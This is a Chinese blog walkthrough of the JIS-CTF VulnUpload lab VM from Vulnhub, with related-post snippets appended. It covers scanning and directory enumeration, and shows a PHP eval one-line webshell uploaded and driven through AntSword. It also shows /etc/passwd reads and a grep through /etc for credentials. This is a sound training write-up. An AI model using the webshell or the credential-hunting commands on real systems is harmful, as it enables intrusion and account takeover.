VulnhubJIS-CTF靶机详解

于 2024-08-11 21:27:48 发布
阅读量846 收藏 6
点赞数 22
分类专栏: 靶机 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62457642/article/details/141112229
版权

项目地址

https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/

修改靶机的网卡

开机时长按shift,进入此页面

image.png

选择第二个,进入

image.png

等待加载完成

image.png
image.png

选择root模式进入

将只读模式改为读写模式
mount -o remount,rw /

查看本机的网卡名称
ifconfig -a

image.png

修改默认网卡
vi /etc/network/interfaces

image.png

wq!保存退出,reboot重启即可

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

image.png

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.47.1-254

image.png

根据对比可知JIS-CTF的一个ip地址为192.168.47.144

扫描JIS-CTF的操作系统,端口及对应服务

nmap -A -p- 192.168.47.144

image.png

发现开放22端口和80端口

访问网站

image.png
进入了一个登录界面
但是不知道账号密码

对网站进行目录枚举

dirb http://192.168.47.144

image.png
发现存在一个robots.txt和一个flag网站
访问一下

访问http://192.168.47.144/flag

image.png

得到了第一个flag

访问http://192.168.47.144/robots.txt

image.png
对文件中的网站进行逐一访问

只在/admin_area网站里面存在一句话

image.png
存疑,感觉有问题

查看网站的源码

image.png

得到了第二个flag以及一个账号密码

回到登陆界面尝试登录

image.png
成功登录
发现可以上传文件

写一个一句话木马上传

<?php eval($_POST['cmd']); ?>

image.png
image.png
image.png
上传成功
通过robots.txt可知,文件上传到uploaded_files里面

蚁剑连接

image.png
连接成功

寻找文件

image.png

发现了一个flag.txt

打开是空的
image.png

使用命令查看

image.png
没有权限
再看看其他的

在hint.txt发现了第三个flag

image.png
文件里面提到尝试使用 technawi 用户名和密码 来查看flag.txt文件
之前扫描ip开放了22端口

尝试使用ssh进行连接

image.png
发现需要密码

在蚁剑里面寻找一下
cat /etc/passwd

image.png
x说明密码在shadow里面保存
image.png
没有权限访问被拒

尝试扫描关键字来查找密码
grep -r technawi  /etc/

image.png
扫到了,在credentials.txt文件里
image.png

得到了第四个flag以及ssh的登录账号密码

ssh连接

image.png
连接成功

直接访问html目录下的flag.txt
cat /var/www/html/flag.txt

image.png

得到最后一个flag

image.png

秋妤.
关注
专栏目录
CTF6靶机实战
千寻的博客
05-25 1737
文章目录总结CTF6靶机下载地址环境搭建靶机实战信息收集漏洞查找漏洞利用提权摘抄 总结 信息搜集,端口扫描,目录扫描,获取敏感目录和压缩包文件 下载源代码,进行审计代码,得到数据库账号和密码(发现账号和密码,其实和敏感目录下的一样) 敏感目录下,获取账号和密码(发现是主页的登陆账号密码) 使用msf生成php反向shell,通过文件上传漏洞上传shell,并访问进行触发 寻找Linux内核漏洞exp,提权root CTF6靶机下载地址 https://download.vulnhub.com/lamps
靶机渗透训练——JIS-CTF-VulnUpload-CTF01
z7sz的博客
06-22 499
这是一篇关于JIS-CTF-VulnUpload-CTF01靶机训练的文章
ctf靶机的安装
viviliving的专栏
10-03 2710
Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装 一.配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: 在Windows和Linux上安装VirtualBox 创建一个Kali Linux虚拟机 更新和升级Kali Linux 为渗透测试配置web浏览器(即在Firefox浏览器下安装一些常用的插件) 创建一个属于自己的靶机 配置网络使虚拟机正常通信 了解靶机上易受攻击的web应用程序 1.5、创建客户端虚拟机 现在,我们...
CTF靶机 DC-3
weixin_52221158的博客
09-02 888
CTF靶场 DC-3详细讲解
CTF实践 靶机渗透
Radiency的博客
11-23 1562
CTF实践。通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围
CTF靶机 Brooklyn Nine Nine 笔记
z4yn:)的博客
08-24 295
Brooklyn Nine Nine 这个房间的目标是初学者水平的黑客,但任何人都可以尝试破解这个盒子。有两种主要的方法用于根目录。 nmap扫描端口 nmap -sV 10.10.235.168 -P- 用nmap对21,22,80端口进行综合扫描 经探测21端口FTP可以匿名登录 nmap -A 10.10.235.168 -p21,22,80 先登录到FTP ftp 10.10.235.168 下载里面note_to_jake.txt 查看这个txt可以列出三个账号:A...
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
juice-shop-ctf:OWASP Juice Shop的标志捕获(CTF)环境设置工具
04-30
juice-shop-ctf-cli支持以下开源CTF框架: 特遣部队 基金会 根盒子 设置 npm install -g juice-shop-ctf-cli 用法 互动模式 打开命令行并运行: juice-shop-ctf 然后按照交互式命令行工具的说明进行操作。 ...
JIS-CTFVulnUpload实战靶机搭建及玩耍攻略
星|Donstpast
04-03 1852
最近玩了一把子vulnhub的volnupload靶机,需要完整找出五个flag,我格局小,只是为了得到flag,所以,本文或许基础知识不会很多。主要是想体验那种实战夺旗的feel。另外也相当预自己的一个笔记吧。 该靶机下载地址:https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/ 注:vulnhub中有很多优秀的实战靶机,自己可以下载下来去玩...
CTF-misc工具2-CTF-Tools-masterV1.3.7
最新发布
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF6靶机实战.zip
05-25
CTF6靶机实战包括三部分: 1)靶机实战过程 2)文件上传的反弹shell文件(shell.php) 3)系统版本漏洞需要的文件(8478.sh)
CTF靶机Easy Peasy 笔记
z4yn:)的博客
10-28 655
Easy Peasy 练习使用诸如Nmap和GoBuster之类的工具来查找隐藏目录,以初步访问易受攻击的计算机。然后通过易受攻击的cronjob升级您的特权 常规操作,先Nmap扫一波端口,开放了80端口,65524高危端口。ssh服务也被改到了6498端口 先访问80端口,是个nginx的默认页面。 上来就是dirb先扫一波目录,探测到hidden目录,hidden下还有一个子目录whatever。一个个来 访问一下是个像是通往地下室的门的图片 查...
CTF靶机 Kenobi 笔记
z4yn:)的博客
06-23 430
Kenobi 靶机描述 : 使用Linux机器的演练。枚举Samba的共享,操作一个易受攻击的proftpd版本,并使用环境变量操作升级您的特权。 靶机标签 : smb, suid, 环境变量操纵 星球大战主题 Nmap扫一波端口 开放端口好多 尝试了80端口,没有可以利用的地方 尝试枚举smb Nmap枚举SMB服务 nmap -p 445 --script = smb-enum-shares.nse,smb-enum-users.nse...
CTF靶机 Tomghost 笔记
z4yn:)的博客
06-23 527
Tomghost 靶机介绍 : 识别最近的漏洞,试图利用系统或读取您不应该访问的文件 靶机标签 : Tomcat, sudo zip提权, pgp, CVE-2020-1938 目标机ip:10.10.218.159 攻击机:kali Nmap 扫描目标机端口 开放了22,53,8009,8080端口 nmap -sV 10.10.218.159 访问8080端口,Apache Tomcat/9.0.30 在exploit-db上搜索对应CVE 下载EXP利用 下载后记得赋予执行权限 python
CTF靶机 Lian_Yu 笔记
z4yn:)的博客
06-29 367
Lian_Yu 靶机简介:A beginner level security challenge 靶机标签:挑战 目录爆破 隐写术 隐藏 nmap 端口扫描 nmap -sV 10.10.182.140 -p- 访问80端口,查看一下robots.txt文件。没有这个文件 用dirbuster扫一波目录,发现两个目录 这个/island目录下面有个暗号is: 查看页面源代码,发现暗号被用白色字体“隐藏”起来了 框选一下全文,暗号出来了。vigilante 暂时不知
CTF靶机 Tartarus 笔记
z4yn:)的博客
09-04 370
Tartarus 这是基于服务的简单枚举和基本特权升级技术的新手靶场。基于杰克 Nmap扫一波全端口,开放了21,22,80端口 nmap -sV 10.10.48.224 -p- 用nmap -A 综合扫描一下,探测到FTP允许匿名登录 Anonymous FTP login allowed 里面有一个test.txt文件 nmap -A 10.10.48.224 FTP里有个test.txt文件 ftp 10.10.48.224 #登录到ftp 输入用户名anonym
CTF靶机 Wgel CTF笔记
z4yn:)的博客
07-12 550
Wgel CTF 靶机简介:您可以渗出根标志吗? 靶机标签:security Nmap扫描开放端口 开放了80,22 访问80端口,apache默认页面 用dirbuster扫描网站目录,访问了各个目录也没有发现可利用点。 肯定还有目录没有扫出来 gobuster dir -u http://10.10.237.25/sitemap -w /usr/share/wordlists/dirb/common.txt -x "html,php,txt" 扫出一个ssh私钥目录 /
CTF_靶机学习
vurtual的博客
02-27 789
** pwn_2 ** 在学逆向网站开启靶机 把目标文件read复制到虚拟机中 把靶机地址拷贝下来 用objdump -t -j .text read查看文件里的函数 查看到有exploit func函数。其他都是系统的函数。 进入gdb disass func函数 看到有调用read函数。 <+7>和<+12>是系统check栈,不用管。 <+4><+17>一共提升了0x28的空间 disass exploit函数 复制首地址 运行这个pyth
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值